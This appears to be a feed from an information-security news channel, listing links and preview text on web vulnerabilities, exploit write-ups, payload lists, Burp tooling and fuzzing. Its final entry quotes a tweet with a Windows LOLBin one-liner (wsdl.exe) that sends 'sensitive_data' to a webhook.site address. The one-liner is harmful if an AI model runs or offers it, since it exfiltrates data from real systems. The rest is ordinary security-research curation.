Information Security
@sec_nerd_en
Information Security News
We are @sec_nerd's twin brother
Information Security
https://www.blackhat.com/presentations/bh-dc-08/McFeters-Rios-Carter/Presentation/bh-dc-08-mcfeters-rios-carter.pdf
Information Security
https://www.secjuice.com/xss-arithmetic-operators-chaining-bypass-sanitization/
Information Security
https://github.com/jaeles-project/jaeles
GitHub
GitHub - jaeles-project/jaeles: The Swiss Army knife for automated Web Application Testing
The Swiss Army knife for automated Web Application Testing - jaeles-project/jaeles
Information Security
https://swarm.ptsecurity.com/grafana-6-4-3-arbitrary-file-read/
PT SWARM
Grafana 6.4.3 Arbitrary File Read
An article about an Arbitrary File Read vulnerability (CVE-2019-19499) in Grafana
Information Security
https://medium.com/@bamalkaranbamal/how-to-spot-and-exploit-postmessage-vulnerablities-329079d307cc
Medium
How to spot and exploit postMessage vulnerablities?
Here is a primer on finding and creating POCs for bugs found with postMessage javascript function
Information Security
https://www.hackerone.com/blog/Top-Firewall-Misconfigurations-that-Lead-to-Easy-Exploitations
HackerOne
Top Firewall Misconfigurations that Lead to Easy Exploitations by Attackers
Network security should be a major focus for companies moving to the cloud. Cloud networks are exposed to the Internet and companies don’t have direct control of the hardware running them. When not configured correctly, networks in the cloud could be attacked…
Information Security
https://github.com/GoSecure/dtd-finder/blob/698fd678f26395e1c7c097525f7182aecad0cd5f/list/xxe_payloads.md
GitHub
dtd-finder/list/xxe_payloads.md at 698fd678f26395e1c7c097525f7182aecad0cd5f · GoSecure/dtd-finder
List DTDs and generate XXE payloads using those local DTDs. - GoSecure/dtd-finder
Information Security
https://twitter.com/juwilie1337/status/1301099882304942086
Twitter
juwilie
If you want your own Burp Collaborator, but with more protocols and web panel here it is https://t.co/jUZj6VWAy7
Information Security
https://lab.wallarm.com/340-weak-jwt-secrets-you-should-check-in-your-code/
Wallarm
☝️
340 weak JWT secrets you should check in your code
340 weak JWT secrets you should check in your code. Don't leave your web app's authentication exposed to hackers. Review this list
Information Security
https://prookl.dev/uncategorized/writing-a-burp-extension/
Prookl
Writing A Burp Extension, Prookl
I recently took a Black Hat course by MDSec called
Information Security
https://github.com/summitt/Burp-Non-HTTP-Extension
GitHub
GitHub - summitt/Nope-Proxy: TCP/UDP Non-HTTP Proxy Extension (NoPE) for Burp Suite.
TCP/UDP Non-HTTP Proxy Extension (NoPE) for Burp Suite. - summitt/Nope-Proxy
Information Security
https://securitylab.github.com/advisories/GHSL-2020-027-netflix-conductor
GitHub Security Lab
GHSL-2020-027: Server-Side Template Injection in Netflix Conductor
A Server-Side Template Injection was identified in Netflix Conductor enabling attackers to inject arbitrary Java EL expressions, leading to a pre-auth Remote Code Execution (RCE) vulnerability.
Information Security
https://x64sec.sh/custom-dll-injection-with-cobalt-strike/
Information Security
https://github.com/Nalen98/AngryGhidra
GitHub
GitHub - Nalen98/AngryGhidra: Use angr in Ghidra
Use angr in Ghidra.
Information Security
https://hardik05.wordpress.com/2020/09/05/fuzzing-with-hongfuzz-fuzzing-a-simple-c-program/
Hardik05's Blog
[Fuzzing with hongfuzz] Fuzzing a simple C program
Video post by @hardik05.
Information Security
https://github.com/b1ack0wl/linux_mint_poc
GitHub
GitHub - b1ack0wl/linux_mint_poc
Information Security
https://github.com/rdoix/Buffer-Overflow-Cheat-Sheet
GitHub
GitHub - rdoix/Buffer-Overflow-Cheat-Sheet
Information Security
https://research.securitum.com/prototype-pollution-and-bypassing-client-side-html-sanitizers/
research.securitum.com
Prototype pollution - and bypassing client-side HTML sanitizers - research.securitum.com
In this article I’ll cover the prototype pollution vulnerability and show it can be used to bypass client-side HTML sanitizers. I’m also considering various ways to find exploitation of prototype pollution via semi-automatic methods. It could also be a big…
Information Security
https://googleprojectzero.blogspot.com/2020/09/attacking-qualcomm-adreno-gpu.html?m=1
Blogspot
Attacking the Qualcomm Adreno GPU
Posted by Ben Hawkes, Project Zero. When writing an Android exploit, breaking out of the application sandbox is often a key step. There are a...
Information Security
https://twitter.com/NtSetDefault/status/1303643299509567488
Twitter
NtRaiseException()
Another way to use #LOLBins for data exfiltration "C:\Program Files (x86)\Microsoft SDKs\Windows\v7.0A\bin\wsdl.exe" /server https[:]//webhook.site/xxxxx-xxxx-xxxxxx?sensitive_data
🚧
UserAgent: Mozilla/4.0 (compatible; MSIE 6.0; MS Web Services Client Protocol…